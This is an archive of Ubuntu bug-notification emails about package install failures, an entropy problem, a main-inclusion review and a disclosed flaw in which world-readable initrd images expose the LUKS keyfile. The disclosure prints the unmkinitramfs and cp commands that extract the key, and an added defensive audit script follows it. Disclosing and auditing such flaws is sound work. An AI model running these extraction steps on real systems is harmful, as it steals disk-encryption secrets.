   9.4ubuntu4.9: Broken package because of missing "#" @ 
/var/lib/dpkg/info/base-files.postinst +131

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to base-files in Ubuntu.
https://bugs.launchpad.net/bugs/1836335

Title:
  package base-files 9.4ubuntu4.9 failed to install/upgrade: subprocess
  installed post-installation script returned error exit status 127

Status in base-files package in Ubuntu:
  New

Bug description:
  I don't know

  ProblemType: Package
  DistroRelease: Ubuntu 16.04
  Package: base-files 9.4ubuntu4.9
  ProcVersionSignature: Ubuntu 4.4.0-155.182-generic 4.4.181
  Uname: Linux 4.4.0-155-generic i686
  ApportVersion: 2.20.1-0ubuntu2.19
  Architecture: i386
  Date: Fri Jul 12 10:26:43 2019
  Dependencies:
   
  DuplicateSignature:
   package:base-files:9.4ubuntu4.9
   Setting up base-files (9.4ubuntu4.9) ...
   /var/lib/dpkg/info/base-files.postinst: 131: /var/lib/dpkg/info/base-files.postinst: Automatically: not found
   dpkg: error processing package base-files (--configure):
    subprocess installed post-installation script returned error exit status 127
  ErrorMessage: subprocess installed post-installation script returned error exit status 127
  InstallationDate: Installed on 2011-11-14 (2796 days ago)
  InstallationMedia: Ubuntu 11.04 "Natty Narwhal" - Release i386 (20110427.1)
  RelatedPackageVersions:
   dpkg 1.18.4ubuntu1.5
   apt  1.2.32
  SourcePackage: base-files
  Title: package base-files 9.4ubuntu4.9 failed to install/upgrade: subprocess 
installed post-installation script returned error exit status 127
  UpgradeStatus: Upgraded to xenial on 2017-11-12 (606 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/base-files/+bug/1836335/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1835464] Re: nginx service fails after libssl update due to low entropy at boot

2019-07-08 Thread Seth Arnold
I read through Bionic's systemd-random-seed.service source (src/random-
seed/random-seed.c) and didn't see any references to RNDADDTOENTCNT or
RNDADDENTROPY, the ioctl(2)s that are used to indicate to the kernel
that added entropy should be used for the random(4) device. Maybe
they're hidden behind some abstraction layers, but if so, I didn't spot
them.

Does anyone know if this is intentional? Or what reasoning might have
led to this decision?

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1835464

Title:
  nginx service fails after libssl update due to low entropy at boot

Status in nginx package in Ubuntu:
  Opinion
Status in openssl package in Ubuntu:
  New
Status in nginx source package in Bionic:
  Opinion
Status in openssl source package in Bionic:
  New

Bug description:
  After updating libssl and related packages, nginx will no longer
  autostart at system boot.

  Immediately after boot, nginx.service is in a failed state.

  # service nginx status
  ● nginx.service - A high performance web server and a reverse proxy server
     Loaded: loaded (/lib/systemd/system/nginx.service; enabled; vendor preset: enabled)
     Active: failed (Result: timeout) since Fri 2018-08-24 21:27:51 UTC; 32min ago
       Docs: man:nginx(8)

  systemd[1]: Starting A high performance web server and a reverse proxy server...
  systemd[1]: nginx.service: Start-pre operation timed out. Terminating.
  systemd[1]: nginx.service: Failed with result 'timeout'.
  systemd[1]: Failed to start A high performance web server and a reverse proxy server.

  
  The service can be manually started after boot.

  # service nginx start
  # service nginx status
  ● nginx.service - A high performance web server and a reverse proxy server
     Loaded: loaded (/lib/systemd/system/nginx.service; enabled; vendor preset: enabled)
     Active: active (running) since Fri 2018-08-24 22:02:06 UTC; 2s ago
       Docs: man:nginx(8)
    Process: 2704 ExecStart=/usr/sbin/nginx -g daemon on; master_process on; (code=exited, status=0/SUCCESS)
    Process: 2703 ExecStartPre=/usr/sbin/nginx -t -q -g daemon on; master_process on; (code=exited, status=0/SUCCESS)
   Main PID: 2705 (nginx)
     CGroup: /system.slice/nginx.service
             ├─2705 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
             └─2706 nginx: worker process

  systemd[1]: Starting A high performance web server and a reverse proxy server...
  systemd[1]: nginx.service: Failed to parse PID from file /run/nginx.pid: Invalid argument
  systemd[1]: Started A high performance web server and a reverse proxy server.

  
  This happens on an ARMHF based microcontroller running ubuntu 18.04.2 raspi 
server distribution with a stock kernel.org 4.9-181 kernel.

  Ubuntu repositories are not accessible from the device, so packages
  are copied to the device, and apt install is used to upgrade them:

  apt install --no-install-recommends $dir/updates/system/*.deb | logger 2>&1

  
  The following is a list of packages that, when upgraded, cause the nginx 
systemd service to fail to autostart at boot.

  201,205c201,205
  < ii  libpython2.7:armhf  2.7.15-4ubuntu4~18.04 armhf 
   Shared Python runtime library (version 2.7)
  < ii  libpython2.7-minimal:armhf  2.7.15-4ubuntu4~18.04 armhf 
   Minimal subset of the Python language (version 2.7)
  < ii  libpython2.7-stdlib:armhf   2.7.15-4ubuntu4~18.04 armhf 
   Interactive high-level object-oriented language (standard library, 
version 2.7)
  < ii  libpython3.6-minimal:armhf  3.6.8-1~18.04.1   armhf 
   Minimal subset of the Python language (version 3.6)
  < ii  libpython3.6-stdlib:armhf   3.6.8-1~18.04.1   armhf 
   Interactive high-level object-oriented language (standard library, 
version 3.6)
  ---
  > ii  libpython2.7:armhf  2.7.15~rc1-1ubuntu0.1 armhf 
   Shared Python runtime library (version 2.7)
  > ii  libpython2.7-minimal:armhf  2.7.15~rc1-1ubuntu0.1 armhf 
   Minimal subset of the Python language (version 2.7)
  > ii  libpython2.7-stdlib:armhf   2.7.15~rc1-1ubuntu0.1 armhf 
   Interactive high-level object-oriented language (standard library, 
version 2.7)
  > ii  libpython3.6-minimal:armhf  3.6.7-1~18.04 armhf 
   Minimal subset of the Python language (version 3.6)
  > ii  libpython3.6-stdlib:armhf   3.6.7-1~18.04 armhf 
   Interactive high-level object-oriented language (standard library, 
version 3.6)
  225c225
  < ii  libssl1.1:armhf 1.1.1-1ubuntu2.1~18.04.2  armhf 
   Secure Sockets Layer toolkit - shared libraries
  ---
  > ii  libssl1.1:armhf 1.1.0g-2ubuntu4.3 armhf 
  

[Touch-packages] [Bug 1820203] Re: [MIR] libpgm as dependency of mailman3

2019-07-02 Thread Seth Arnold
** Changed in: libpgm (Ubuntu)
 Assignee: Ubuntu Security Team (ubuntu-security) => (unassigned)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libpgm in Ubuntu.
https://bugs.launchpad.net/bugs/1820203

Title:
  [MIR] libpgm as dependency of mailman3

Status in libpgm package in Ubuntu:
  New

Bug description:
  [Availability]
  The package is already in universe for quite a while and build/works fine so far.
  It is for example already used for 
https://lists.canonical.com/mailman3/postorius/lists/
  OTOH it is a library that can/could be used for much more than just the 
mailman3 stack.

  It builds on all architectures (arch:any)

  [Security]

  No known CVEs found.
  The protocol had some issues a few years ago and related issues in 
Cisco/Microsoft products, but I found no open issues in the package.
  => https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=pgm

  [Quality assurance]

  As part of the mailman3 stacks as of now (Disco) this installs fine and works 
fine.
  On itself it is useful to (many) other dependencies and does not need a post 
install configuration on its own.

  The package does not ask debconf questions.

  One known bug in each of Ubuntu and Debian.
  - The Ubuntu bug is outdated and should be ok with 5.2 which we have.
  - The Debian bug is only important for solaris builds
  Upstream has 16 open and 27 closed issues - nothing very severe for our 
intentions.

  The package seems to get updates by Debian as needed.
  But upstream seems to have stopped releasing after 2012.
  => https://github.com/steve-o/openpgm/releases
  After talking with one of the uploaders it became clear that they still work 
on master and fixes can be pulled from there as needed.
  https://github.com/steve-o/openpgm/commits/master

  No exotic HW involved.

  There are some tests in ./openpgm/pgm/test/ and ./openpgm/pgm/*_unittest.c 
but dh_auto_test isn't catching them.
  OTOH I can't even guarantee they would be usable, but TL;DR no build time 
tests run.

  d/watch is set up and ok.

  No Lintian warning except newer Standards/Compat versions and no
  HTTPS links uses or GPG checks - nothing severe.

  The package does not rely on demoted or obsolete packages.
  The Scons build system is a pain, but it seems to work as packaged by Debian 
so no complaints.
  No new gtk2 dependencies
  As mentioned the package itself might be abandoned/orphaned by upstream

  [UI standards]

  It uses i18n from gi18n-lib to provide the infrastructure, but I found no 
translations so far.
  But that is ok as this is a low level library without (a lot) of user visible 
strings - no translations (needed).
  No End-user applications that needs a standard conformant desktop file.

  [Dependencies]

  Some dependencies are not in main, but we drive MIR for all related packages
  that are not in main at the same time.
  Please check the list of bugs from the main Mailman3 MIR in bug 1775427 to 
get an overview.

  [Standards compliance]
  The package meets the FHS and Debian Policy standards.
  The packaging itself is very straight forward and uses dh_* as much as 
possible - the d/rules fits on one screen.

  [Maintenance]

  The Server team will subscribe for the package for maintenance, but in
  general it seems low on updates and currently is a sync from Debian.

  [Background]
  The package description explains the general purpose and context of the 
package well.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libpgm/+bug/1820203/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1835095] Re: Lubuntu initrd images leaking cryptographic secret when disk encryption is used

2019-07-02 Thread Seth Arnold
** Also affects: lubuntu-meta (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/1835095

Title:
  Lubuntu initrd images leaking cryptographic secret when disk
  encryption is used

Status in initramfs-tools package in Ubuntu:
  Confirmed
Status in lubuntu-meta package in Ubuntu:
  New

Bug description:
  Hello!

  I've had a short discussion about this issue on lubuntu irc, and I was
  asked to open a bug report. Basically I only tested this on lubuntu
  19.04 x64 live image on a UEFI system, I haven't tested other ubuntu
  flavors.

  Anyway, I was poking around with disk encryption, and I noticed that
  lubuntu live image uses a graphical installation tool called
  Calamares. This tool has an option to encrypt the hard disk during
  installation, and the encryption setup that is used is the newer one
  with /boot folder as part of the encrypted rootfs. Traditionally the
  installers used to setup encryption where there is a main LUKS-
  encrypted rootfs volume on the HDD and a separate unencrypted /boot
  partition where the grub config files, the kernel and the initrd
  images reside. Ever since grub2 added support for LUKS several distros
  have apparently moved to the newer scheme which is very similar to the
  one that was first described by Pavel Kogan in his blog.

  A) https://www.pavelkogan.com/2014/05/23/luks-full-disk-encryption/
  B) https://www.pavelkogan.com/2015/01/25/linux-mint-encryption/

  
  This new scheme stores the rootfs (including the /boot folder) on a single 
LUKS-encrypted partition with two keyslots in use. One of the keyslots is 
normally a passphrase that is used in the first stage by the grub2 EFI image as 
pre-boot authentication. It serves to decrypt the rootfs, access the contents 
of /boot and copy the config, kernel and initrd image to RAM. Once done, grub2 
then forgets the passphrase and closes the encrypted volume. The system will 
continue to boot, but at this point the rootfs will now have to be decrypted a 
second time - this time by the kernel/initrd so it can be mounted. Normally 
this is the point where the user would be asked to enter a passphrase for the 
second time, but for convenience reasons (to automate the process) a second 
LUKS keyslot and a keyfile are used instead.

  The file /crypto_keyfile.bin is generated during the installation
  phase. This is the secret keyfile that is used to unlock the other
  LUKS keyslot and decrypt the rootfs. It is properly protected with
  owner set to root:root and file permissions 600 (-rw-------).
  Unfortunately the key is not of much use while it resides inside the
  encrypted volume that it is supposed to decrypt. This is where
  initramfs-tools comes into play. I believe there is a special hook
  inside /usr/share/initramfs-tools/hooks that is responsible for
  copying this crypto_keyfile.bin file into appropriate initrd image.
  This image that now contains the secret keyfile is copied into RAM
  during the first decryption stage by the grub2.

  
  While the original secret keyfile /crypto_keyfile.bin is protected:

  $ ls -l /
  ...
  -rw-------  1 root root  2048 jul 2 18:34  crypto_keyfile.bin
  ...
  $ sha1sum /crypto_keyfile.bin
  sha1sum: /crypto_keyfille.bin: Permission denied
  $ sudo sha1sum /crypto_keyfile.bin
  7a1c44fd036510cc02e32c094bd16b4a76a7f14c  /crypto_keyfile.bin

  The second copy (the one inside initramfs image) is not:

  $ ls -l /boot
  ...
  -rw-r--r--  1 root root 68149041 jul  2 18:35 initrd.img-5.0.0-13-generic

  As you can see, the initramfs images that are generated by mkinitramfs
  will have the user:group set to root:root, but their access flags will
  be 644 (-rw-r--r--). This means that any user or even a script that
  has read access to the file system can read and extract the secret
  keyfile from an initramfs image.

  Run as user:
  $ unmkinitramfs /boot/initrd.img-5.0.0-13-generic /tmp
  $ sha1sum /tmp/main/crypto_keyfile.bin
  7a1c44fd036510cc02e32c094bd16b4a76a7f14c  /tmp/main/crypto_keyfile.bin

  
  Would there be any adverse effects, if we were to set mkinitramfs (i.e. via a 
hook) to always set file permissions of initramfs images to 600 whenever this 
type of disk encryption is used?

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/1835095/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1835096] Re: Unprivileged user can access LUKS keyfile

2019-07-02 Thread Seth Arnold
*** This bug is a duplicate of bug 1835095 ***
https://bugs.launchpad.net/bugs/1835095

** Information type changed from Private Security to Public Security

** This bug has been marked a duplicate of bug 1835095
   Lubuntu initrd images leaking cryptographic secret when disk encryption is 
used

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to initramfs-tools in Ubuntu.
https://bugs.launchpad.net/bugs/1835096

Title:
  Unprivileged user can access LUKS keyfile

Status in initramfs-tools package in Ubuntu:
  New
Status in lubuntu-meta package in Ubuntu:
  New

Bug description:
  Lubuntu 19.04 and newer uses Calamares as installer. During the
  installation, the user can choose to encrypt the entire disk (Full
  Disk Encryption FDE). Calamares creates an LUKS container (and an EFI-
  System-Partition, when needed).

  When booting, Grub asks for the passphrase to unlock the LUKS
  container. For convenience, there is the keyfile "/crypto_keyfile.bin"
  (600, root:root) which will be used later to unlock the LUKS container
  again.

  An unprivileged user can't copy or read the keyfile. But the keyfile
  is also in the initrd.img.

  Attack:
  Even an unprivileged user has read-access to the initrd.img under /boot, so 
the attacker can execute:
  (1) $ unmkinitramfs /boot/initrd.img-5.0.0.20-generic /tmp/initrd
  (2) $ cp /tmp/initrd/main/crypto_keyfile.bin ~

  DREAD (LOW = 1, MEDIUM = 2, HIGH = 3):
  Damage: HIGH => This attack allows to get the keyfile
  Reproducibility: HIGH => Works every time with access to the system
  Exploitability: LOW/MEDIUM => You must have access to a shell and the 
unencrypted device (maybe in combination with another vulnerability)
  Affected users: MEDIUM => Every user which uses Lubuntu 19.04 and newer in 
combination with FDE, maybe also other users
  Discoverability: HIGH => The origin of this bug report is publicly logged: 
https://irclogs.ubuntu.com/2019/07/02/%23lubuntu.html#t10:26

  DREAD-Rating: 12/13 of 15

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/1835096/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
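
A check for the exposure described in bug 1835095 and its duplicate 1835096 above, as an added example that is not part of either report or of initramfs-tools. It lists initramfs images that group or other can read and reports whether the `UMASK` setting documented in initramfs.conf(5) will keep the next rebuilt image private. The function names are hypothetical, GNU find is assumed, and only the given configuration directory is read.

```shell
#!/bin/sh
# Added example: audit for initramfs images that non-root users can read.
# Function names are hypothetical. Directories are parameters so the check
# can be exercised on a scratch tree. Assumes GNU find (-maxdepth, -perm /).

# List initramfs images directly under $1 that group or other may read.
world_readable_initrds() {
    boot_dir=${1:-/boot}
    find "$boot_dir" -maxdepth 1 -type f -name 'initrd.img-*' -perm /044 | sort
}

# Print the last UMASK= assignment found in initramfs.conf and conf.d/*
# under $1 (later files override earlier ones). Prints nothing if unset.
effective_umask() {
    conf_dir=${1:-/etc/initramfs-tools}
    for f in "$conf_dir/initramfs.conf" "$conf_dir"/conf.d/*; do
        [ -f "$f" ] || continue
        sed -n 's/^[[:space:]]*UMASK=\([0-7][0-7]*\).*$/\1/p' "$f"
    done | tail -n 1
}

# Succeed only if the octal umask $1 masks read access for both group
# and other, i.e. a new image would be created without those bits.
umask_blocks_read() {
    case ${1:-} in
        ''|*[!0-7]*) return 1 ;;
    esac
    [ $(( 0$1 & 044 )) -eq $(( 044 )) ]
}

# Report both conditions. Returns 0 when nothing is exposed, 1 otherwise.
# Note: UMASK only affects images built afterwards; existing images keep
# their mode until they are regenerated or chmod'ed.
audit_initrd_exposure() {
    boot_dir=${1:-/boot}
    conf_dir=${2:-/etc/initramfs-tools}
    rc=0

    exposed=$(world_readable_initrds "$boot_dir")
    if [ -n "$exposed" ]; then
        printf '%s\n' "$exposed" | sed 's/^/readable by group or other: /'
        rc=1
    fi

    um=$(effective_umask "$conf_dir")
    if ! umask_blocks_read "$um"; then
        printf 'rebuilt images will be readable: UMASK=%s\n' "${um:-unset}"
        rc=1
    fi
    return "$rc"
}

# Run the audit against the live system only when asked to.
case ${1:-} in
    --run) shift; audit_initrd_exposure "$@" ;;
esac
```

Run it with `--run` to audit `/boot` and `/etc/initramfs-tools`, or pass two directories after `--run` to audit another tree.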


[Touch-packages] [Bug 1495302] Re: subprocess installed post-installation script returned error exit status 10

2019-06-18 Thread Seth Arnold
*** This bug is a duplicate of bug 1832919 ***
https://bugs.launchpad.net/bugs/1832919

** This bug has been marked a duplicate of bug 1832919
   installed libssl1.1:amd64 package post-installation script subprocess 
returned error exit status 10

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1495302

Title:
  subprocess installed post-installation script returned error exit
  status 10

Status in openssl package in Ubuntu:
  Triaged

Bug description:
  Upgrading to wily

  $ sudo dpkg --configure libssl1.0.0   

  Setting up libssl1.0.0:amd64 (1.0.2d-0ubuntu1) ...
  Checking for services that may need to be restarted...done.
  Checking for services that may need to be restarted...done.
  Checking init scripts...
  dpkg: error processing package libssl1.0.0:amd64 (--configure):
   subprocess installed post-installation script returned error exit status 10
  Errors were encountered while processing:
   libssl1.0.0:amd64

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libssl1.0.0 1.0.2d-0ubuntu1
  ProcVersionSignature: Ubuntu 3.19.0-27.29-generic 3.19.8-ckt5
  Uname: Linux 3.19.0-27-generic x86_64
  ApportVersion: 2.17.2-0ubuntu1.4
  Architecture: amd64
  CurrentDesktop: Unity
  Date: Sun Sep 13 23:22:19 2015
  InstallationDate: Installed on 2015-04-19 (147 days ago)
  InstallationMedia: Ubuntu 15.04 "Vivid Vervet" - Beta amd64 (20150417.1)
  SourcePackage: openssl
  UpgradeStatus: Upgraded to wily on 2015-09-13 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1495302/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1509011] Re: package libssl1.0.0 1.0.2d-0ubuntu1 failed to install/upgrade: 14.4828:subprocess installed post-installation script returned error exit status 10

2019-06-18 Thread Seth Arnold
*** This bug is a duplicate of bug 1832919 ***
https://bugs.launchpad.net/bugs/1832919

** This bug is no longer a duplicate of bug 1495302
   subprocess installed post-installation script returned error exit status 10
** This bug has been marked a duplicate of bug 1832919
   installed libssl1.1:amd64 package post-installation script subprocess 
returned error exit status 10

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1509011

Title:
  package libssl1.0.0 1.0.2d-0ubuntu1 failed to install/upgrade:
  14.4828:subprocess installed post-installation script returned error
  exit status 10

Status in openssl package in Ubuntu:
  Invalid

Bug description:
  Dependency problem after upgrading from 15.04 to 15.10

  ProblemType: Package
  DistroRelease: Ubuntu 15.10
  Package: libssl1.0.0 1.0.2d-0ubuntu1
  ProcVersionSignature: Ubuntu 3.19.0-31.36-generic 3.19.8-ckt7
  Uname: Linux 3.19.0-31-generic x86_64
  ApportVersion: 2.17.2-0ubuntu1.5
  Architecture: amd64
  Date: Thu Oct 22 18:18:44 2015
  DuplicateSignature: package:libssl1.0.0:1.0.2d-0ubuntu1:14.4828:subprocess 
installed post-installation script returned error exit status 10
  ErrorMessage: 14.4828:subprocess installed post-installation script returned 
error exit status 10
  InstallationDate: Installed on 2015-02-02 (262 days ago)
  InstallationMedia: Ubuntu 14.04.1 LTS "Trusty Tahr" - Release amd64 
(20140722.2)
  RelatedPackageVersions:
   dpkg 1.18.2ubuntu5
   apt  1.0.10.2ubuntu1
  SourcePackage: openssl
  Title: package libssl1.0.0 1.0.2d-0ubuntu1 failed to install/upgrade: 
14.4828:subprocess installed post-installation script returned error exit 
status 10
  UpgradeStatus: Upgraded to wily on 2015-10-22 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1509011/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1510185] Re: package python3 3.4.3-1 failed to install/upgrade: pre-dependency problem - not installing python3

2019-06-18 Thread Seth Arnold
*** This bug is a duplicate of bug 1832919 ***
https://bugs.launchpad.net/bugs/1832919

** This bug is no longer a duplicate of bug 1495302
   subprocess installed post-installation script returned error exit status 10
** This bug has been marked a duplicate of bug 1832919
   installed libssl1.1:amd64 package post-installation script subprocess 
returned error exit status 10

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1510185

Title:
  package python3 3.4.3-1 failed to install/upgrade: pre-dependency
  problem - not installing python3

Status in openssl package in Ubuntu:
  Confirmed

Bug description:
  Upgrading to Ubuntu 15.10.

  ProblemType: Package
  DistroRelease: Ubuntu 15.10
  Package: python3
  ProcVersionSignature: Ubuntu 3.19.0-21.21-generic 3.19.8
  Uname: Linux 3.19.0-21-generic x86_64
  ApportVersion: 2.19.1-0ubuntu3
  Architecture: amd64
  Date: Mon Oct 26 10:17:33 2015
  DuplicateSignature: package:python3:3.4.3-1:pre-dependency problem - not 
installing python3
  ErrorMessage: pre-dependency problem - not installing python3
  InstallationDate: Installed on 2015-06-11 (137 days ago)
  InstallationMedia: Ubuntu 15.04 "Vivid Vervet" - Release amd64 (20150422)
  RelatedPackageVersions:
   dpkg 1.18.2ubuntu5
   apt  1.0.10.2ubuntu1
  SourcePackage: python3-defaults
  Title: package python3 3.4.3-1 failed to install/upgrade: pre-dependency 
problem - not installing python3
  UpgradeStatus: Upgraded to wily on 2015-10-26 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1510185/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1832421] Re: openssl reboot needed message using incorrect path to X server

2019-06-14 Thread Seth Arnold
I'm not sure how to do SRU verification on this update. I don't know a
set of steps to take to see the update notification when running X11.
Upgrading and downgrading among several packages did NOT show the update
notification:

sarnold@hunt:/tmp$ sudo dpkg -i 
~/Downloads/libssl1.1_1.1.1-1ubuntu2.1~18.04.1_amd64.deb 
(Reading database ... 293979 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1-1ubuntu2.1~18.04.1_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1-1ubuntu2.1~18.04.1) over 
(1.1.1-1ubuntu2.1~18.04.1) ...
Setting up libssl1.1:amd64 (1.1.1-1ubuntu2.1~18.04.1) ...
Processing triggers for libc-bin (2.27-3ubuntu1) ...
sarnold@hunt:/tmp$ sudo apt-get install libssl1.1=1.1.1-1ubuntu2.1~18.04.2
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-headers-4.15.0-48 linux-headers-4.15.0-48-generic 
linux-image-4.15.0-48-generic
  linux-modules-4.15.0-48-generic linux-modules-extra-4.15.0-48-generic 
linux-tools-4.15.0-48
  linux-tools-4.15.0-48-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be upgraded:
  libssl1.1
1 upgraded, 0 newly installed, 0 to remove and 73 not upgraded.
Need to get 0 B/1,295 kB of archives.
After this operation, 0 B of additional disk space will be used.
Preconfiguring packages ...
(Reading database ... 293979 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1-1ubuntu2.1~18.04.2_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1-1ubuntu2.1~18.04.2) over 
(1.1.1-1ubuntu2.1~18.04.1) ...
Processing triggers for libc-bin (2.27-3ubuntu1) ...
Setting up libssl1.1:amd64 (1.1.1-1ubuntu2.1~18.04.2) ...
Checking for services that may need to be restarted...done.
Checking for services that may need to be restarted...done.
Checking init scripts...

Restarting services possibly affected by the upgrade:

Services restarted successfully.

Processing triggers for libc-bin (2.27-3ubuntu1) ...
sarnold@hunt:/tmp$ sudo apt-get install libssl1.1=1.1.1-1ubuntu2.1~18.04.3
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages were automatically installed and are no longer required:
  linux-headers-4.15.0-48 linux-headers-4.15.0-48-generic 
linux-image-4.15.0-48-generic
  linux-modules-4.15.0-48-generic linux-modules-extra-4.15.0-48-generic 
linux-tools-4.15.0-48
  linux-tools-4.15.0-48-generic
Use 'sudo apt autoremove' to remove them.
The following packages will be upgraded:
  libssl1.1
1 upgraded, 0 newly installed, 0 to remove and 73 not upgraded.
Need to get 0 B/1,295 kB of archives.
After this operation, 4,096 B of additional disk space will be used.
Preconfiguring packages ...
(Reading database ... 293979 files and directories currently installed.)
Preparing to unpack .../libssl1.1_1.1.1-1ubuntu2.1~18.04.3_amd64.deb ...
Unpacking libssl1.1:amd64 (1.1.1-1ubuntu2.1~18.04.3) over 
(1.1.1-1ubuntu2.1~18.04.2) ...
Processing triggers for libc-bin (2.27-3ubuntu1) ...
Setting up libssl1.1:amd64 (1.1.1-1ubuntu2.1~18.04.3) ...
Processing triggers for libc-bin (2.27-3ubuntu1) ...

I'm going to mark this verification-done-bionic, because the notifier
didn't show on my desktop system. Feel free to revert if you know a good
way to see the notification on a desktop when it shouldn't have been
visible.

Thanks

** Tags removed: verification-needed-bionic
** Tags added: verification-done-bionic

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1832421

Title:
  openssl reboot needed message using incorrect path to X server

Status in openssl package in Ubuntu:
  Fix Committed
Status in openssl source package in Bionic:
  Fix Committed
Status in openssl source package in Cosmic:
  Fix Committed
Status in openssl source package in Disco:
  Fix Committed
Status in openssl source package in Eoan:
  Fix Committed

Bug description:
  [Impact]

   * On desktop, upgrading libssl1.1 does not show reboot required
  notification

  [Test Case]

   * Boot ubuntu desktop
   * Upgrade libssl1.1
   * Observe reboot notification pop-up from update-notifier is _not_ shown

  [Regression Potential]

   * Tweaking postinst only to correct for the Xorg path. Current code
  is inert, but is well exercised in prior releases.

  [Other Info]

   * Original bug report:

  Hello, the openssl library postinst file is using pidof /usr/bin/X,
  but that doesn't appear to be the path to the X11 server any more:

  debian/libssl1.1.postinst:

  # Only issue the reboot notification for servers; we proxy this by
  # testing that the X server is not running (LP: #244250)
  if ! pidof /usr/bin/X > /dev/null && [ -x /usr/share/update-notifier/notify-reboot-required ]; then
  

[Touch-packages] [Bug 1832919] Re: installed libssl1.1:amd64 package post-installation script subprocess returned error exit status 10

2019-06-14 Thread Seth Arnold
Stephen, AMD invented the 64 bit extensions to the x86 instruction set
and brought their processors to market well before Intel brought theirs
to market. Thus AMD won a huge amount of name recognition. Debian
standardized on "amd64" to name packages for the architecture many years
ago.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1832919

Title:
  installed libssl1.1:amd64 package post-installation script subprocess
  returned error exit status 10

Status in openssl package in Ubuntu:
  Confirmed

Bug description:
  The error happens when trying to configure libssl1.1:amd64 (dpkg
  --configure -D 2  libssl1.1)

  dpkg: error processing package libssl1.1:amd64 (--configure):
   installed libssl1.1:amd64 package post-installation script subprocess 
returned error exit status 10
  D02: post_script_tasks - ensure_diversions
  D02: post_script_tasks - trig_incorporate
  D02: check_triggers_cycle pnow=libc-bin:amd64 first
  Processing triggers for libc-bin (2.27-3ubuntu1) ...
  D02: post_postinst_tasks - trig_incorporate
  Errors were encountered while processing:
   libssl1.1:amd64

  The attempted fix
  Line #153 of file /var/lib/dpkg/info/libssl1.1\:amd64.postinst
  - db_get libraries/restart-without-asking
  + db_get libraries/restart-without-asking || true
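  Review bot: the `|| true` appended to `db_get libraries/restart-without-asking` at line #153 only hides the failing lookup; it does not show why the lookup fails on this system, and anything the script does with the answer afterwards would run on a value that was never fetched. Consider handling the failure explicitly, for example by falling back to a stated default when `db_get` fails, and recording the cause of the exit status 10 in the bug before shipping the workaround.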

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1832919/+subscriptions



[Touch-packages] [Bug 1820203] Re: [MIR] libpgm as dependency of mailman3

2019-06-12 Thread Seth Arnold
** Attachment added: "Coverity results"
   
https://bugs.launchpad.net/ubuntu/+source/libpgm/+bug/1820203/+attachment/5270475/+files/coverity.txt

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libpgm in Ubuntu.
https://bugs.launchpad.net/bugs/1820203

Title:
